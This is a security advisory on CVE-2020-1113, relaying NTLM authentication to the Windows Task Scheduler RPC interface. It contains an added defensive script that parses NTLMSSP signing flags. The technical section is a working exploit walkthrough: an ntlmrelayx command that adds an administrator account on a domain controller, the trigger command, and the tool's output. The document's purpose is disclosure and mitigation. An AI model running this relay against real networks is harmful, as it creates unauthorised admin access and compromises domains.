################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product:  Windows Task Scheduler
# Vendor:   Microsoft
# CSNC ID:  CSNC-2010-001
# CVE ID:   CVE-2020-1113
# Subject:  Security Feature Bypass
# Risk:     High
# Effect:   Remotely exploitable
# Authors:  Sylvain Heiniger
# Date:     14.05.2020
#
################################################################################

Introduction:
-------------

NTLM relay attacks are a well-known privilege escalation technique in Windows
networks. Compass Security identified a security feature bypass vulnerability
in Microsoft Windows. Because the RPC protocol, and in particular the Task
Scheduler interface, does not require integrity verification of received data,
a man-in-the-middle attacker can relay a victim's NTLM authentication to a
target of their choice over RPC. Provided the victim has administrative
privileges on the target, the attacker can execute code on that target.

Affected:
---------

Vulnerable:
* Windows 7
* Windows 8.1
* Windows 10
* Windows Server 2008
* Windows Server 2008 R2
* Windows Server 2012
* Windows Server 2016
* Windows Server 2019

For details about the affected versions and the relevant update, please refer
to Microsoft's advisory [1].

Technical Description:
----------------------

To the best of our knowledge, at the time of writing there is no way to require
signing on RPC connections, so relay attacks can be performed over RPC. A
hardened system on which a classical SMB relay attack fails is still vulnerable
to an attacker who can relay HTTP, SMB or RPC connections to RPC.

MS-TSCH is the RPC protocol used to manage scheduled tasks. It does not specify
any requirement for the server to verify the integrity of received data, so a
relayed session that negotiated neither signing nor sealing is accepted.
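The property the advisory turns on is visible in the NTLM negotiation itself: whether the NTLMSSP_NEGOTIATE_SIGN and NTLMSSP_NEGOTIATE_SEAL flags survive into the AUTHENTICATE message the target receives, and whether the target insists on them. The following script is an added example written for this page; it is not part of the Compass Security advisory nor of impacket. It decodes the three NTLMSSP message types according to the offsets and flag values of MS-NLMP and reports the identity and the negotiated integrity flags. The sample messages, the flag combinations, the domain/user names and the "WS14" workstation name are all constructed here for illustration and carry no real credentials.

```python
"""Decode NTLMSSP messages and report whether signing/sealing was negotiated.

Added example for this advisory; not part of Compass Security's advisory nor of
impacket. Field offsets and flag values follow MS-NLMP (NEGOTIATE_MESSAGE,
CHALLENGE_MESSAGE, AUTHENTICATE_MESSAGE). All sample messages are constructed
locally with struct.pack.
"""
import base64
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3

# Subset of NegotiateFlags (MS-NLMP 2.2.2.5): bit value -> name
FLAGS = {
    0x00000001: "NEGOTIATE_UNICODE",
    0x00000002: "NEGOTIATE_OEM",
    0x00000004: "REQUEST_TARGET",
    0x00000010: "NEGOTIATE_SIGN",
    0x00000020: "NEGOTIATE_SEAL",
    0x00000200: "NEGOTIATE_NTLM",
    0x00008000: "NEGOTIATE_ALWAYS_SIGN",
    0x00080000: "NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x00800000: "NEGOTIATE_TARGET_INFO",
    0x02000000: "NEGOTIATE_VERSION",
    0x20000000: "NEGOTIATE_128",
    0x40000000: "NEGOTIATE_KEY_EXCH",
    0x80000000: "NEGOTIATE_56",
}
UNICODE, SIGN, SEAL, ALWAYS_SIGN = 0x1, 0x10, 0x20, 0x8000


def _field(buf, off):
    """Read an MS-NLMP field descriptor (Len, MaxLen, BufferOffset) and return its bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]


def parse(blob):
    """Return message type, flags and (for AUTHENTICATE) the identity fields of one NTLMSSP blob."""
    if isinstance(blob, str):                      # base64 text, e.g. from "Authorization: NTLM ..."
        blob = base64.b64decode(blob)
    if blob[:8] != SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", blob, 8)[0]
    info = {"type": msg_type}
    if msg_type == NEGOTIATE:
        info["flags"] = struct.unpack_from("<I", blob, 12)[0]
    elif msg_type == CHALLENGE:
        info["flags"] = struct.unpack_from("<I", blob, 20)[0]
        info["server_challenge"] = blob[24:32]
    elif msg_type == AUTHENTICATE:
        flags = struct.unpack_from("<I", blob, 60)[0]
        enc = "utf-16-le" if flags & UNICODE else "latin-1"   # OEM strings decoded as 8-bit
        info.update(flags=flags,
                    domain=_field(blob, 28).decode(enc),
                    user=_field(blob, 36).decode(enc),
                    workstation=_field(blob, 44).decode(enc),
                    nt_response_len=len(_field(blob, 20)))
    else:
        raise ValueError(f"unknown NTLMSSP message type {msg_type}")
    info["flag_names"] = [name for bit, name in FLAGS.items() if info["flags"] & bit]
    return info


def integrity_negotiated(flags):
    """True when the session will sign (or seal) its traffic.

    ALWAYS_SIGN alone only requests the presence of a signature block; per
    MS-NLMP it is overridden by SIGN/SEAL and does not by itself give integrity.
    """
    return bool(flags & (SIGN | SEAL))


def build_negotiate(flags):
    """Construct a NEGOTIATE_MESSAGE with empty domain/workstation fields (sample data)."""
    return SIGNATURE + struct.pack("<II", NEGOTIATE, flags) + struct.pack("<HHI", 0, 0, 32) * 2


def build_authenticate(flags, domain, user, workstation, nt_response=b"\x11" * 24):
    """Construct a minimal AUTHENTICATE_MESSAGE (sample data, not a real logon)."""
    enc = "utf-16-le" if flags & UNICODE else "latin-1"
    # Header field order: LM response, NT response, domain, user, workstation, session key
    parts = [b"", nt_response, domain.encode(enc), user.encode(enc), workstation.encode(enc), b""]
    header_len = 88                                # fixed part including Version (8) and MIC (16)
    fields, payload = b"", b""
    for data in parts:
        fields += struct.pack("<HHI", len(data), len(data), header_len + len(payload))
        payload += data
    return (SIGNATURE + struct.pack("<I", AUTHENTICATE) + fields
            + struct.pack("<I", flags) + b"\x00" * 8 + b"\x00" * 16 + payload)


# Constructed: flags a Windows client typically requests, including SIGN and SEAL.
CLIENT_FLAGS = (UNICODE | 0x2 | 0x4 | SIGN | SEAL | 0x200 | ALWAYS_SIGN | 0x80000
                | 0x02000000 | 0x20000000 | 0x40000000 | 0x80000000)
# Constructed: the same negotiation with SIGN and SEAL cleared, i.e. an unsigned session.
RELAYED_FLAGS = CLIENT_FLAGS & ~(SIGN | SEAL)


def audit(blob):
    """Summarise one message: who is authenticating and whether integrity was negotiated."""
    info = parse(blob)
    identity = None
    if info["type"] == AUTHENTICATE:
        identity = f'{info["domain"]}\\{info["user"]}'
    return {"type": info["type"], "identity": identity,
            "signed_or_sealed": integrity_negotiated(info["flags"]),
            "flags": info["flag_names"]}


if __name__ == "__main__":
    for msg in (build_negotiate(CLIENT_FLAGS),
                build_authenticate(RELAYED_FLAGS, "WINLAB", "scooper-da", "WS14")):
        print(audit(msg))
```

Feed `parse()` the base64 value of an HTTP `Authorization: NTLM` header or the raw NTLMSSP blob carved from an SMB Session Setup or RPC bind PDU. An AUTHENTICATE message whose flags carry neither NEGOTIATE_SIGN nor NEGOTIATE_SEAL can only lead to code execution if the receiving server, like the Task Scheduler endpoint described in this advisory, does not require integrity; a server that enforces signing rejects such a session.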
Our modified version of impacket [2] adds an RPCRelayServer and an RPCRelayClient
as well as an RPCAttack (based on ATExec). In our setup the attacker machine has
the IP 172.16.100.21, while the victim machine, a domain controller (DC) running
Windows Server 2016, has the IP 172.16.100.1.

We run ntlmrelayx with the -t and -c arguments to specify the target and the
command to execute:

    # ntlmrelayx.py -ip 0.0.0.0 -t rpc://172.16.100.1 -c "net user compass StrongPass.123 /add && net localgroup Administrators compass /add"
    Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

    [*] Protocol Client SMB loaded..
    [*] Protocol Client HTTP loaded..
    [*] Protocol Client HTTPS loaded..
    [*] Protocol Client MSSQL loaded..
    [*] Protocol Client SMTP loaded..
    [*] Protocol Client RPC loaded..
    [*] Protocol Client LDAP loaded..
    [*] Protocol Client LDAPS loaded..
    [*] Protocol Client IMAP loaded..
    [*] Protocol Client IMAPS loaded..
    [*] Running in relay mode to single host
    [*] Setting up RPC Server
    [*] Setting up SMB Server
    [*] Setting up HTTP Server

    [*] Servers started, waiting for connections

Next, trigger a connection to the attacker machine. In this case the user
WINLAB\scooper-da, who is a member of the local Administrators group on the DC,
makes an SMB connection from the machine with IP 172.16.100.14 to the attacker
machine on IP 172.16.100.21:

    # net view \\172.16.100.21\noshare\

The tool picks up the connection and relays it:

    ...
    [*] SMBD-Thread-4: Received connection from 172.16.100.14, attacking target rpc://172.16.100.1
    [*] Authenticating against rpc://172.16.100.1 as WINLAB\scooper-da SUCCEED
    [*] Trying to execute specified command (net user compass StrongPass.123 /add && net localgroup Administrators compass /add)
    [*] Creating task \WeumPsdH
    [*] Running task \WeumPsdH
    [*] Deleting task \WeumPsdH

As a result, the given command is executed on the DC through a scheduled task
and a new local administrator account "compass" is created.

Workaround / Fix:
-----------------

* Patch your Windows.
* Enforce packet signing for clients and servers via GPO (for SMB: "Microsoft
  network client/server: Digitally sign communications (always)"; for LDAP:
  "Domain controller: LDAP server signing requirements"). This blocks relaying
  to SMB and LDAP targets, but does not protect RPC endpoints such as the Task
  Scheduler, for which the patch is required.
* Check your Active Directory ACLs: apply the least privilege principle so that
  a relayed account does not hold administrative rights on other hosts.
* Network segmentation can help prevent relay attacks.

Timeline:
---------

2020-01-27: Discovery by Sylvain Heiniger
2020-01-29: Initial vendor notification
2020-01-29: Initial vendor response
2020-02-13: Vendor acknowledgement
2020-04-16: CVE-2020-1113 assigned
2020-05-12: Release of fixed version as part of Patch Tuesday [1]
2020-05-14: Public disclosure
2020-06-14: Proof-of-concept code disclosure [3]

References:
-----------

[1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1113
[2] https://github.com/SecureAuthCorp/impacket
[3] https://github.com/CompassSecurity/impacket